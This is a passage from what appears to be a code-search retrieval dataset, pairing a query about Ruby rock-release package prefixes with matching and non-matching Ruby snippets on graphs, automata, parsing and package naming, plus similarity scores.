"def solution(s, p, q)\n result = []\n\n (0..p.size-1).each do |idx|\n buff = s[p[idx]..q[idx]]\n if buff.index('A')\n result << 1\n elsif buff.index('C')\n result << 2\n elsif buff.index('G')\n result << 3\n else\n result << 4\n end\n end\n\n return result\nend",
"def villian; end",
"def set_next_veg(vgg)\n\t# Check if the next vegetable to eat is valid\n\t#check_veg(vgg)\n\t\n\t$cur_veg = vgg\nend",
"def edge(v, w)\n (@from_store[v] || []).find{ |e| e.to == w }\n end",
"def traverse; end",
"def bidirectional_djikstra\n\nend",
"def edgesymbol\n directed ? '->' : '--'\n end",
"def relational\r\n node = add()\r\n\r\n loop do\r\n if consume(\"<\")\r\n node = new_binary(ND_LT, node, add())\r\n elsif consume(\"<=\")\r\n node = new_binary(ND_LE, node, add())\r\n elsif consume(\">\")\r\n node = new_binary(ND_LT, add(), node)\r\n elsif consume(\">=\")\r\n node = new_binary(ND_LE ,add(), node)\r\n else\r\n return node\r\n end\r\n end\r\nend",
"def each_relation_edge(rg)\n rg.nodes.each { |node|\n [:src,:dst].each { |rg_level|\n next unless node.get_block(rg_level)\n node.successors(rg_level).each { |node2|\n if node2.type == :exit || node2.get_block(rg_level)\n yield IPETEdge.new(node,node2,pml_level(rg_level))\n end\n }\n }\n }\n end",
"def gratr_comparability_explore(edge, k, classification, space='')\r\n ret = gratr_comparability_explore_inner(edge, k, classification, :forward, space)\r\n gratr_comparability_explore_inner(edge.reverse, k, classification, :backward, space) && ret\r\n end",
"def targets v\n vset = Set.new\n each_edge {|e| vset |= get_vertices(e[2]) if e[1].keyvalue_sub(v) }\n return vset\n end",
"def other_vertex(vertex1)\n end",
"def other_vertex(vertex1)\n end",
"def plexus_comparability_explore(edge, k, classification, space='')\n ret = plexus_comparability_explore_inner(edge, k, classification, :forward, space)\n plexus_comparability_explore_inner(edge.reverse, k, classification, :backward, space) && ret\n end",
"def has_edge?(u, v)\n @forward_edges_with_info[u]&.key?(v)\n end",
"def activeG(g, gi, gv)\n state(ACTIVATEDG, g, gi, gv) and\n not f(g, gi, gv) and\n not satisfiedG(g, gi, gv) and\n not terminalG(g, gi, gv) and\n not state(SUSPENDEDG, g, gi, gv)\nend",
"def vogal(str)\n vogals = [\"a\", \"e\", \"i\", \"o\", \"u\"]\n cons = [\"b\", \"c\", \"d\", \"f\", \"g\", \"h\", \"j\", \"k\", \"l\", \"m\", \"n\", \"p\", \"q\", \"r\", \"s\", \"t\", \"v\", \"w\", \"x\", \"y\", \"z\"]\n# splitting the string given into arrays \n str = str.chars\n str_new = str.map do |char|\n#looping the string into the next letter\n if vogals.include?(char)\n vogals.rotate(1)[vogals.index(char)]\n else cons.include?(char)\n cons.rotate(1)[cons.index(char)]\n end\n end\n#joining the strings back\n str_new.join\nend",
"def daggers\n Regexp.new s_to_h(<<-S)\n B1 96 B1 D3 ED AE 5F 92 1B 66 03 01 .. FF FF FF\n FF .. .. .. .. 4A 19 01 0B 03 00 00 00 08 00 00\n 00 14 00 00 00 00 00 00 00 07 00 00 00 00 00 00\n 00 02 00 00 00 02 00 00 00 99 32 C5 C4 CC 57 6D\n 43 90 6B 03 01 FF FF FF FF 99 32 C5 C4 CC 57 6D\n 43 27 9E 00 01 FF FF FF FF 01 00 00 00 99 32 C5\n C4 CC 57 6D 43 27 9E 00 01 FF FF FF FF 13 00 00\n 00 00 00 00 00 00 00 00 00 05 00 00 00 00 00 00\n 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00\n 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00\n 00\n S\nend",
"def g(&b)\n c = self\n return lambda { \n break false if !c.probe\n b.call(c.rcv)\n break true \n }\n end",
"def edges\n h = hedges\n v = vedges\n [ h[0], v[1], h[1], v[0] ]\n end",
"def add_edge(u, v)\n raise NotImplementedError\n end",
"def g(x)\n -> (y) { f(x, y) }\nend",
"def graphviz(oGraph, c0, c1, c2, c3, c4)\n return if @src_id.nil? || @dst_id.nil?\n return if @count > 1 # TODO: eliminate dupulicate trans\n\n guard = @block.condition_success unless @block.nil?\n guard = \"unknown\" if guard.nil?\n\n if @title.nil?\n title = ''\n else\n title = \"#{@title}\"\n end\n @label = @type + '(' + title + ')\\n' + guard + '\\n' + @block.id\n\n if (@src_id =~ /^V_/) && (@dst_id =~ /^V_/)\n # V to V form\n src_id = @src_id + '_inbound'\n dst_id = @dst_id + '_inbound'\n\n elsif (@src_id =~ /^V_/) && (@dst_id =~ /^C_/)\n src_id = @src_id + '_inbound'\n dst_id = @dst_id\n\n c2.add_node(dst_id) if $graphviz_with_rank\n elsif (@src_id =~ /^C_/) && (@dst_id =~ /^V_/)\n src_id = @src_id\n dst_id = @dst_id + '_outbound'\n c2.add_node(src_id) if $graphviz_with_rank\n c4.add_node(dst_id) if $graphviz_with_rank\n elsif (@src_id =~ /^C_/) && (@dst_id =~ /^C_/)\n # redirect\n src_id = @src_id\n dst_id = @dst_id\n c2.add_node(src_id) if $graphviz_with_rank\n c3.add_node(dst_id) if $graphviz_with_rank\n else\n src_id = @src_id\n dst_id = @dst_id\n end\n\n # draw\n e = oGraph.add_edge(src_id, dst_id, label: @label)\n end",
"def m(a, b=:default, *c, d, e:, f:1, **g, &h)\n [a, b, c, d, e, f, g, h.call]\nend",
"def union! newFA\n end",
"def dependency(start, vertex, nested = T.unsafe(nil)); end",
"def component_of(v)\n @component[v]\n end",
"def component_of(v)\n @component[v]\n end",
"def classify_edge(x,y)\n if y.parent == x\n return :tree\n elsif y.discovered? and !y.processed?\n return :back\n elsif y.processed? and y.pre < x.pre\n return :cross\n elsif y.processed? and x.pre < y.pre\n return :forward\n end\nend",
"def bridge\n visited = {}\n disc = [Float::INFINITY] * @V\n low = [Float::INFINITY] * @V\n parent = [-1] * @V\n (0...@V).each{|u|\n bridgeUtil(u, visited, parent, low, disc)\n }\n @answer\n\n end",
"def translate( *args ) \n ## From Martin Rinehart 'Edges to Rubies' chapter 15\n ## May be called with a transformation and a vector, \n ## or with a transformation and r, g, b values.\n\n trans = args[0]\n if args.length == 2\n vec = args[1]\n r = vec[0]; g = vec[1]; b = vec[2] \n else\n r = args[1]; g = args[2]; b = args[3] \n end\n arr = trans.to_a()\n arr[12] += r; arr[13] += g; arr[14] += b \n return Geom::Transformation.new( arr )\n \n\tend",
"def union! newFA\n \n ustart = new_state\n uend = new_state\n \n add_transition(ustart, @start, \"\")\n add_transition(ustart, newFA.start, \"\")\n set_start(ustart)\n\n @transition.merge!(newFA.transition)\n @state.merge!(newFA.state)\n\n @final.keys.each { |key| add_transition(key, uend, \"\")}\n newFA.final.keys.each { |key| add_transition(key, uend, \"\")}\n\n \n @final.keys.each { |key| set_final(key, false)}\n set_final(uend, true)\n \n newFA.alphabet.each{|letter|\n if !@alphabet.include?(letter)\n @alphabet.push(letter)\n end\n } \n\n\n end",
"def solve(w, g, v)\n\n\tif $words[g] == -1\n\t\treturn v\n\telsif $words[g] == 1\n\t\treturn v + 1\n\tend\n\t#else $words[g] == 0\n\n\ttkn = next_token(w)\t\n\tfor char in tkn.chars\n\t\tv = solve(String.new(w), g + char, v)\n\tend\n\n\treturn v\nend",
"def explore(vertex)\n #binding.pry if vertexes.size == 4\n vertex = self[vertex]\n visited = Set.new\n visit_order = []\n tree = {}\n stack = []\n if vertex.is_nothing?\n return Nothing.new\n else\n vertex = vertex.from_just\n end\n # we will build a depth first search tree with backedges\n # A backedge will occur if a tree is discovered with an edge that is on a higher level in the tree\n stack.push vertex\n visit_order.push vertex.key\n visited.add vertex.key\n tree[vertex.key] = {:children => []}\n until stack.empty?\n candidate = stack.pop\n candidate.neighbours.each do |dest| # iterate through the neighbours of the vertex\n if !visited.member? dest.key # if the destination has not been visited\n visited.add dest.key\n visit_order.push dest.key # add destination to visitation path\n # Set the destinations parent to the candidate\n tree[dest.key] = {:parent => candidate.key, :children => []}\n # Add the destination key to the list of children of the canditate\n tree[candidate.key][:children].push dest.key\n #add the candidate and destination to the top of the stack so that we can return to them later in the algorithm\n stack.push candidate \n stack.push dest\n break # leave the loop, this only runs once\n end\n end\n end\n return Just.new({ tree: tree, visit_order: visit_order })\n end",
"def bases_g\n base_composition[:g]\n end",
"def pair; end",
"def each_adjacent(v, &block) # :yields: v\n raise NotImplementedError\n end",
"def hash\n\t\t[@a, @b, self.class::D].hash\n\tend",
"def each_vertex(&block) # :yields: v\n raise NotImplementedError\n end",
"def algorithm=(_); end",
"def algorithm=(_); end"
] | [
"0.518043",
"0.5179151",
"0.51606786",
"0.5020858",
"0.5017522",
"0.49492475",
"0.49427435",
"0.49024993",
"0.48651722",
"0.48567945",
"0.4855347",
"0.48414737",
"0.48189622",
"0.48189622",
"0.47811005",
"0.47811005",
"0.47726956",
"0.47606915",
"0.47451782",
"0.4734499",
"0.47137165",
"0.46974853",
"0.4665371",
"0.4660371",
"0.46531543",
"0.46315628",
"0.46196422",
"0.46079165",
"0.46052146",
"0.45989415",
"0.45989415",
"0.45989415",
"0.45989415",
"0.45989415",
"0.45989415",
"0.45756364",
"0.45754945",
"0.4574938",
"0.45630157",
"0.45552254",
"0.4551526",
"0.4551526",
"0.45509306",
"0.45476002",
"0.45303914",
"0.4528851",
"0.45129436",
"0.45100787",
"0.45068127",
"0.4505969",
"0.4503712",
"0.44905683",
"0.44857267",
"0.44654316",
"0.44650963",
"0.4463152",
"0.4461733",
"0.44547957",
"0.4450527",
"0.4450527",
"0.44457546",
"0.4431492",
"0.4431035",
"0.442258",
"0.44213396",
"0.4408695",
"0.44043672",
"0.4398739",
"0.4395812",
"0.43911448",
"0.43737373",
"0.43672022",
"0.43672022",
"0.43649316",
"0.43644708",
"0.4363736",
"0.43628076",
"0.4359646",
"0.43587667",
"0.4347963",
"0.43410328",
"0.4318507",
"0.43037862",
"0.43023074",
"0.4301096",
"0.42999458",
"0.42962846",
"0.42962846",
"0.4295298",
"0.42916772",
"0.4289982",
"0.4285672",
"0.4282316",
"0.42690703",
"0.42635047",
"0.4260221",
"0.42562276",
"0.4254982",
"0.42509422",
"0.42398143",
"0.42398143"
] | 0.0 | -1 |
Get the current rock-release-based prefix for rock packages | def rock_release_prefix(release_name = nil)
release_name ||= rock_release_name
if release_name
pkg_prefix_base + "-#{release_name}-"
else
pkg_prefix_base + "-"
end
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def rock_ruby_release_prefix(release_name = nil)\n rock_release_prefix(release_name) + \"ruby-\"\n end",
"def base_prefix\n Starter::Config.read[:prefix]\n end",
"def prefix\n regexify(bothify(fetch('aircraft.prefix')))\n end",
"def prefixed_label(package)\n label = ( package =~ /^#{$prefix}(.*)$/ ) && $1 || package\n label = '.' if label.empty?\n label\nend",
"def exec_prefix() return @prefix end",
"def prefix\n if brewed?\n # Homebrew since a long while only supports frameworked python\n HOMEBREW_PREFIX/\"opt/#{name}/Frameworks/Python.framework/Versions/#{version.major}.#{version.minor}\"\n elsif from_osx?\n # Python on OS X has been stripped off its includes (unless you install the CLT), therefore we use the MacOS.sdk.\n Pathname.new(\"#{MacOS.sdk_path}/System/Library/Frameworks/Python.framework/Versions/#{version.major}.#{version.minor}\")\n else\n # What Python knows about itself\n Pathname.new(`#{binary} -c 'import sys;print(sys.prefix)'`.strip)\n end\n end",
"def prefix\n 'oai_dc' \n end",
"def prefix_for(ns_uri)\n if namespaces_by_uri().has_key?(ns_uri)\n namespaces_by_uri()[ns_uri].prefix || \"\" # namespace.prefix returns nil if there is no prefix defined (default prefix)\n end\n end",
"def version_tag_prefix\n if root_path == repo.root_path\n 'v'\n else\n (repo_rel_path / 'v').to_s\n end\n end",
"def get_pname(resource)\n case resource\n when RDF::Node\n return options[:unique_bnodes] ? resource.to_unique_base : resource.to_base\n when RDF::URI\n uri = resource.to_s\n else\n return nil\n end\n\n #log_debug {\"get_pname(#{resource}), std?}\"}\n pname = case\n when @uri_to_pname.key?(uri)\n return @uri_to_pname[uri]\n when u = @uri_to_prefix.keys.detect {|u| uri.index(u.to_s) == 0}\n # Use a defined prefix\n prefix = @uri_to_prefix[u]\n unless u.to_s.empty?\n prefix(prefix, u) unless u.to_s.empty?\n #log_debug(\"get_pname\") {\"add prefix #{prefix.inspect} => #{u}\"}\n uri.sub(u.to_s, \"#{prefix}:\")\n end\n when @options[:standard_prefixes] && vocab = RDF::Vocabulary.each.to_a.detect {|v| uri.index(v.to_uri.to_s) == 0}\n prefix = vocab.__name__.to_s.split('::').last.downcase\n @uri_to_prefix[vocab.to_uri.to_s] = prefix\n prefix(prefix, vocab.to_uri) # Define for output\n #log_debug {\"get_pname: add standard prefix #{prefix.inspect} => #{vocab.to_uri}\"}\n uri.sub(vocab.to_uri.to_s, \"#{prefix}:\")\n else\n nil\n end\n\n # Make sure pname is a valid pname\n if pname\n md = PNAME_LN.match(pname) || PNAME_NS.match(pname)\n pname = nil unless md.to_s.length == pname.length\n end\n\n @uri_to_pname[uri] = pname\n end",
"def base_prefix\n HaridsyncHelpers.ensure_uppercase_dn_component(group['ou'] || DEFAULT_PREFIX)\n end",
"def prefix\n fetch('university.prefix')\n end",
"def account_prefix\n current_account.account_prefix\n end",
"def prefix\n nil\n end",
"def debian_name(pkg)\n if pkg.kind_of?(Autoproj::RubyPackage)\n debian_ruby_name(pkg.name)\n else\n \"rock-\" + canonize(pkg.name)\n end\n end",
"def prefix\n self.class.prefix\n end",
"def redis_prefix\n @redis_prefix ||= name.underscore\n end",
"def prefix\n raise NotImplementedError\n end",
"def var_prefix\n # ugh, i was generating meta/qb.yml files that set 'var_prefix' to\n # `null`, but it would be nice to\n # \n meta_or 'var_prefix', namespaceless\n end",
"def package_name\n @version ? \"#{@name}-#{@version}\" : @name\n end",
"def prefix(browser, version = nil)\n assert_valid_browser browser\n assert_valid_version browser, version if version\n data = browser_data(browser)\n p = if data[\"prefix_exceptions\"] && data[\"prefix_exceptions\"][version]\n data[\"prefix_exceptions\"][version]\n else\n data[\"prefix\"]\n end\n \"-#{p}\"\n end",
"def package_name\n name = package_drop_last(slug_parts)\n name.empty? ? '_root_' : name\n end",
"def global_prefix\n self.class.global_prefix\n end",
"def prefix\n @data['prefix']\n end",
"def prefix\n ''\n end",
"def prefix\n @obj['prefix']\n end",
"def prefix(num)\n namespace + '_prefix_' + num.to_s\n end",
"def rings_project_name\n \"#{root_project_name}#{RINGS_PREFIX}\"\n end",
"def generateBuildNamePrefix()\n testflight_version_number = get_version_number(\n xcodeproj: \"CICD-DemoApp.xcodeproj\"\n )\n testflight_build_number = get_build_number(\n xcodeproj: \"CICD-DemoApp.xcodeproj\"\n )\n return \"CICD_\" + testflight_version_number.to_s + \"-\" + testflight_build_number.to_s\nend",
"def prefix; end",
"def prefix; end",
"def prefix; end",
"def prefix; end",
"def prefix; end",
"def prefix; end",
"def prefix; end",
"def prefix; end",
"def prefix; end",
"def prefix; end",
"def sdk_prefix\n @sdk_prefix ||= begin\n if !CLT.provides_sdk?\n \"\"\n else\n \"#{CLT::PKG_PATH}/SDKs\"\n end\n end\n end",
"def prefixed(p)\n condition { env['enron.api.prefix'] == p }\n end",
"def get_namespace(node, prefix); end",
"def prefix_dir_of(selection)\n if workspace_dir?(selection)\n ws.prefix_dir\n elsif find_package_set(selection)\n raise NoSuchDir, \"#{selection} is a package set, and package sets do not have prefixes\"\n else\n resolve_package(selection).prefix\n end\n end",
"def powershell_prefix\n [\n Mixlib::Install::Generator::PowerShell.get_script(\"helpers.ps1\"),\n \"$platform_architecture = Get-PlatformArchitecture\",\n \"$platform_version = Get-PlatformVersion\",\n ].join(\"\\n\")\n end",
"def package_name\n @package_name ||=\n Pathname(\"#{cartage.final_name}.tar#{cartage.tar_compression_extension}\")\n end",
"def prefix\n fetch('superhero.prefix')\n end",
"def directory_name\n \n directory_name = ''\n if self.pcb_revision != ''\n directory_name = 'pcb' \n directory_name += self.pcb_prefix + '_' \n directory_name += self.pcb_number + '_'\n directory_name += self.pcb_dash_number + '_'\n directory_name += self.pcb_revision\n end\n \n return directory_name\n \n end",
"def prefix\n \"#{name}::\"\n end",
"def resource_id(prefix)\n if default_config?\n [prefix, project, node_type, node_name]\n else\n [prefix, project, configuration, node_type, node_name]\n end.compact.join(\"_\").tr(\"-\", '_').tr(\"/\", \"_\")\n end",
"def resource_id(prefix)\n if default_config?\n [prefix, project, node_type, node_name]\n else\n [prefix, project, configuration, node_type, node_name]\n end.compact.join(\"_\").tr(\"-\", '_').tr(\"/\", \"_\")\n end",
"def prefix\n\t\treturn nil if self.coupon_prefix.blank?\n\t\tself.coupon_prefix[1..-1]\n\tend",
"def prefix(new_prefix = nil)\n return @prefix if new_prefix.nil?\n @prefix = new_prefix\n end",
"def list_prefix\n @equip_slot_info.list_prefix\n end",
"def get_radiant_player_app_name()\n app_name = \"Radiant Player\"\n return app_name\nend",
"def prefix\n fetch_sample(PREFIXES)\n end",
"def prefix(path=nil)\n return ''\n end",
"def prefix_tag(tag)\n tag = Origen::VersionString.new(tag)\n if tag.semantic?\n tag.prefixed\n else\n tag\n end\n end",
"def prefix(value)\n merge(gadrprefix: value.to_s)\n end",
"def fully_qualified_wire_name\n return java_package\n end",
"def name_prefix\n unless @name_prefix\n @name_prefix = collect_first(&:name_prefix)\n end\n return @name_prefix\n end",
"def vendored_package_name(package)\n\tFile.join($package_name, 'vendor/src', package)\nend",
"def prefix\n (platform_family?('windows') ? 'C:/Chef/' : '/etc/chef/')\nend",
"def package_name(project)\n \"#{project.name}-#{project.version}-#{project.release}.#{@architecture}.pkg.gz\"\n end",
"def str_prefix\n\t\t\t\t\"\"\n\t\t\tend",
"def get_pkg_name(candidate_tag=nil, distro=nil)\n prod_name = self.task.prod\n\n # FIXME: stop that hardcoding... one day!\n pkg_name = self.name\n\n distro = self.task.distros[0] if distro.nil?\n\n is_scl_package = MeadSchedulerService.is_scl_package?(prod_name, self.name)\n # different naming convention for different products\n if prod_name == \"eap6\" && distro == 'el7' && is_scl_package\n pkg_name = \"#{prod_name}-\" + pkg_name.sub(/-#{prod_name}$/, '')\n\n # Only enable scl thing for RHEL distros, aka when distro = el_\n elsif is_scl_package && distro.match(/^el/)\n pkg_name = \"#{prod_name}-\" + pkg_name.sub(/-#{prod_name}$/, '')\n end\n pkg_name\n end",
"def platform_shortname\n if rhel?\n if \"rocky\" == Ohai[\"platform\"]\n \"rocky\"\n else\n \"el\"\n end\n elsif suse?\n \"sles\"\n else\n Ohai[\"platform\"]\n end\n end",
"def platform_version_for_package\n if platform == 'rhel'\n platform_version[/([\\d]+)\\..+/, 1]\n else\n platform_version\n end\n end",
"def prefix(tracker_channel)\n tracker_name = CORNERPIN_NAMING[@counter]\n [tracker_name, tracker_channel].join(\"/\")\n end",
"def debian_meta_name(name, with_rock_release_prefix = true)\n if with_rock_release_prefix\n rock_release_prefix + \"meta-\" + Deb.canonize(name)\n else\n pkg_prefix_base + \"meta-\" + Deb.canonize(name)\n end\n end",
"def prefix(value)\n merge(leprefix: value.to_s)\n end",
"def inherited_prefix\n\t\t\tprefix\n\t\tend",
"def debian_ruby_name(name, with_rock_release_prefix = true, release_name = nil)\n if with_rock_release_prefix\n rock_ruby_release_prefix(release_name) + Deb.canonize(name)\n else\n \"ruby-\" + Deb.canonize(name)\n end\n end",
"def translation_prefix(context = :any)\n prefix = claim_public? ? 'UNAUTHENTICATED' : 'AUTHENTICATED'\n\n # If we only have 1 buyer, then the key used should be for a single buyer only.\n return \"#{prefix}_SINGLE\" if @number_of_buyers == 1 && context == :party_title\n\n prefix\n end",
"def name_prefix=(_arg0); end",
"def prefix pref_name\n @context['prefix'] = pref_name\n end",
"def name_prefix; end",
"def jobid_prefix\n @jobid_prefix\n end",
"def full_name\n if platform == Gem::Platform::RUBY or platform.nil?\n \"#{name}-#{version}\".dup.tap(&Gem::UNTAINT)\n else\n \"#{name}-#{version}-#{platform}\".dup.tap(&Gem::UNTAINT)\n end\n end",
"def package_name(buildno=nil)\n if buildno\n buildno = Time.now.strftime(\"%H*60+%M\")\n versnum = \"#{version}.#{buildno}\"\n else\n versnum = version\n end\n\n if platform\n \"#{name}-#{versnum}-#{platform}\"\n else\n \"#{name}-#{versnum}\"\n end\n end",
"def version_prefix\n '/v2'\n end",
"def full_name\n if platform == Gem::Platform::RUBY or platform.nil? then\n \"#{name}-#{version}\".untaint\n else\n \"#{name}-#{version}-#{platform}\".untaint\n end\n end",
"def install_root\n Pathname.new(ENV[\"PREFIX\"] || \"/var/www/ood/apps/sys\")\n end",
"def prefix_name\n \"CAGNUT_#{Time.now.strftime('%Y%m%d%H%M%S')}\"\n end",
"def drop_prefix(repo)\n repo.split('-')[1].to_s.capitalize\nend",
"def kmer_prefix(kmer)\n prefix = kmer.slice(0, kmer.length-1)\n return prefix\n end",
"def var; HOMEBREW_PREFIX+'var' end",
"def var; HOMEBREW_PREFIX+'var' end",
"def package_name\n [self.config.organization, self.config.project_name].compact.collect(&:underscore).join('-')\n end",
"def native_dependency_name(name, selected_platform = nil)\n if !selected_platform\n selected_platform = @packager.target_platform\n end\n\n # Identify this rock release and its ancestors\n this_rock_release = TargetPlatform.new(@packager.rock_release_name, selected_platform.architecture)\n\n if name.is_a? String\n # Check for 'plain' name, the 'unprefixed' name and for the 'release' name\n if this_rock_release.ancestorContains(name) ||\n selected_platform.contains(name)\n # direct name match always is an os dependency\n # it can never be in a rock release\n return [name, true]\n end\n\n # try debian naming scheme for ruby\n if this_rock_release.ancestorContains(\"ruby-#{Deb.canonize(name)}\") ||\n selected_platform.contains(\"ruby-#{Deb.canonize(name)}\")\n return [\"ruby-#{Deb.canonize(name)}\", true]\n end\n\n # otherwise, ask for the ancestor that contains a rock ruby\n # package\n ancestor_release_name = this_rock_release.releasedInAncestor(\n @packager.debian_ruby_name(name, true, this_rock_release.distribution_release_name)\n )\n if !ancestor_release_name.empty?\n return [@packager.debian_ruby_name(name, true, ancestor_release_name), false]\n end\n\n # Return the 'release' name, since no other source provides this package\n [@packager.debian_ruby_name(name, true), false]\n else\n # ask for the ancestor that contains a rock ruby\n # package\n ancestor_release = this_rock_release.releasedInAncestor(\n @packager.debian_name(name, true, this_rock_release.distribution_release_name)\n )\n if !ancestor_release.empty?\n return [@packager.debian_name(name, true, ancestor_release_name), false]\n end\n\n # Return the 'release' name, since no other source provides this package\n [@packager.debian_name(name, true), false]\n end\n end",
"def use_prefix\n prefix, @prefix = @prefix, nil\n @res << prefix if prefix\n\n prefix\n end",
"def prefix(*args)\n [@options[:env], @options[:prefix], *args].compact.join('.')\n end",
"def prefix(path)\n path ? \"#{path.underscore}__\" : ''\n end",
"def package_name\n # TODO: verify renamed packages\n resource['title']\n end",
"def full_name\n if @prefix != \"\"\n File.join(@prefix, @name)\n else\n @name\n end\n end",
"def prefix_key\n if @struct.prefix_key.size > 0\n @struct.prefix_key[0..-1 - options[:prefix_delimiter].size]\n else\n \"\"\n end\n end",
"def fmri_package_name\n version = project.build_version.split(/[^\\d]/)[0..2].join(\".\")\n platform = Ohai[\"platform_version\"]\n \"#{safe_base_package_name}@#{version},#{platform}-#{project.build_iteration}\"\n end",
"def package_name\n ver = if new_resource.version == 'latest'\n package_metadata[:version]\n else\n new_resource.version\n end\n \"Chef Development Kit v#{ver}\"\n end",
"def generateBuildNamePrefix_Debug()\n prefix = generateBuildNamePrefix\n return prefix + \"-debug\"\nend",
"def version_number\n self.name =~ /RHEL-([0-9]+)/\n return $1.to_i\n end",
"def relative_working_dir\n invoke(:rev_parse, '--show-prefix')\n end"
] | [
"0.72332764",
"0.67280084",
"0.65037626",
"0.63198924",
"0.6315063",
"0.61651635",
"0.6145332",
"0.6092354",
"0.60850835",
"0.6037899",
"0.6021138",
"0.5943009",
"0.5934455",
"0.5924296",
"0.5882006",
"0.585637",
"0.58560544",
"0.58445877",
"0.583058",
"0.5828399",
"0.5825916",
"0.5819291",
"0.581119",
"0.5750354",
"0.5745421",
"0.5742132",
"0.5718122",
"0.57166576",
"0.5708547",
"0.5698306",
"0.5698306",
"0.5698306",
"0.5698306",
"0.5698306",
"0.5698306",
"0.5698306",
"0.5698306",
"0.5698306",
"0.5698306",
"0.5691878",
"0.5680447",
"0.5666108",
"0.56603086",
"0.565329",
"0.5651862",
"0.56483865",
"0.56423175",
"0.56417435",
"0.564134",
"0.564134",
"0.56381166",
"0.56295687",
"0.55995667",
"0.5587268",
"0.5576323",
"0.5569746",
"0.5563265",
"0.5555226",
"0.5519479",
"0.5514015",
"0.55066514",
"0.5494707",
"0.5493073",
"0.5488682",
"0.5481516",
"0.5470986",
"0.5463745",
"0.54601055",
"0.5459782",
"0.5457132",
"0.5449928",
"0.5448203",
"0.54442966",
"0.5443466",
"0.5438609",
"0.5434131",
"0.54334885",
"0.54334563",
"0.54207927",
"0.5416969",
"0.54143983",
"0.5410594",
"0.5405705",
"0.5398837",
"0.53945285",
"0.5391967",
"0.5391967",
"0.53884286",
"0.53872144",
"0.53739697",
"0.53697854",
"0.5367493",
"0.53360575",
"0.53359",
"0.53356767",
"0.5329446",
"0.5319485",
"0.5318414",
"0.5310452",
"0.53099346"
] | 0.7785496 | 0 |
Get the current rock-release-based prefix for rock (ruby) packages | def rock_ruby_release_prefix(release_name = nil)
rock_release_prefix(release_name) + "ruby-"
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def rock_release_prefix(release_name = nil)\n release_name ||= rock_release_name\n if release_name\n pkg_prefix_base + \"-#{release_name}-\"\n else\n pkg_prefix_base + \"-\"\n end\n end",
"def base_prefix\n Starter::Config.read[:prefix]\n end",
"def prefix\n if brewed?\n # Homebrew since a long while only supports frameworked python\n HOMEBREW_PREFIX/\"opt/#{name}/Frameworks/Python.framework/Versions/#{version.major}.#{version.minor}\"\n elsif from_osx?\n # Python on OS X has been stripped off its includes (unless you install the CLT), therefore we use the MacOS.sdk.\n Pathname.new(\"#{MacOS.sdk_path}/System/Library/Frameworks/Python.framework/Versions/#{version.major}.#{version.minor}\")\n else\n # What Python knows about itself\n Pathname.new(`#{binary} -c 'import sys;print(sys.prefix)'`.strip)\n end\n end",
"def exec_prefix() return @prefix end",
"def prefixed_label(package)\n label = ( package =~ /^#{$prefix}(.*)$/ ) && $1 || package\n label = '.' if label.empty?\n label\nend",
"def debian_name(pkg)\n if pkg.kind_of?(Autoproj::RubyPackage)\n debian_ruby_name(pkg.name)\n else\n \"rock-\" + canonize(pkg.name)\n end\n end",
"def version_tag_prefix\n if root_path == repo.root_path\n 'v'\n else\n (repo_rel_path / 'v').to_s\n end\n end",
"def prefix\n regexify(bothify(fetch('aircraft.prefix')))\n end",
"def package_name\n @version ? \"#{@name}-#{@version}\" : @name\n end",
"def powershell_prefix\n [\n Mixlib::Install::Generator::PowerShell.get_script(\"helpers.ps1\"),\n \"$platform_architecture = Get-PlatformArchitecture\",\n \"$platform_version = Get-PlatformVersion\",\n ].join(\"\\n\")\n end",
"def package_name\n @package_name ||=\n Pathname(\"#{cartage.final_name}.tar#{cartage.tar_compression_extension}\")\n end",
"def debian_ruby_name(name, with_rock_release_prefix = true, release_name = nil)\n if with_rock_release_prefix\n rock_ruby_release_prefix(release_name) + Deb.canonize(name)\n else\n \"ruby-\" + Deb.canonize(name)\n end\n end",
"def package_name\n name = package_drop_last(slug_parts)\n name.empty? ? '_root_' : name\n end",
"def sdk_prefix\n @sdk_prefix ||= begin\n if !CLT.provides_sdk?\n \"\"\n else\n \"#{CLT::PKG_PATH}/SDKs\"\n end\n end\n end",
"def get_pname(resource)\n case resource\n when RDF::Node\n return options[:unique_bnodes] ? resource.to_unique_base : resource.to_base\n when RDF::URI\n uri = resource.to_s\n else\n return nil\n end\n\n #log_debug {\"get_pname(#{resource}), std?}\"}\n pname = case\n when @uri_to_pname.key?(uri)\n return @uri_to_pname[uri]\n when u = @uri_to_prefix.keys.detect {|u| uri.index(u.to_s) == 0}\n # Use a defined prefix\n prefix = @uri_to_prefix[u]\n unless u.to_s.empty?\n prefix(prefix, u) unless u.to_s.empty?\n #log_debug(\"get_pname\") {\"add prefix #{prefix.inspect} => #{u}\"}\n uri.sub(u.to_s, \"#{prefix}:\")\n end\n when @options[:standard_prefixes] && vocab = RDF::Vocabulary.each.to_a.detect {|v| uri.index(v.to_uri.to_s) == 0}\n prefix = vocab.__name__.to_s.split('::').last.downcase\n @uri_to_prefix[vocab.to_uri.to_s] = prefix\n prefix(prefix, vocab.to_uri) # Define for output\n #log_debug {\"get_pname: add standard prefix #{prefix.inspect} => #{vocab.to_uri}\"}\n uri.sub(vocab.to_uri.to_s, \"#{prefix}:\")\n else\n nil\n end\n\n # Make sure pname is a valid pname\n if pname\n md = PNAME_LN.match(pname) || PNAME_NS.match(pname)\n pname = nil unless md.to_s.length == pname.length\n end\n\n @uri_to_pname[uri] = pname\n end",
"def prefix\n 'oai_dc' \n end",
"def fully_qualified_wire_name\n return java_package\n end",
"def full_name\n if platform == Gem::Platform::RUBY or platform.nil?\n \"#{name}-#{version}\".dup.tap(&Gem::UNTAINT)\n else\n \"#{name}-#{version}-#{platform}\".dup.tap(&Gem::UNTAINT)\n end\n end",
"def package_name(project)\n \"#{project.name}-#{project.version}-#{project.release}.#{@architecture}.pkg.gz\"\n end",
"def vendored_package_name(package)\n\tFile.join($package_name, 'vendor/src', package)\nend",
"def rings_project_name\n \"#{root_project_name}#{RINGS_PREFIX}\"\n end",
"def full_name\n if platform == Gem::Platform::RUBY or platform.nil? then\n \"#{name}-#{version}\".untaint\n else\n \"#{name}-#{version}-#{platform}\".untaint\n end\n end",
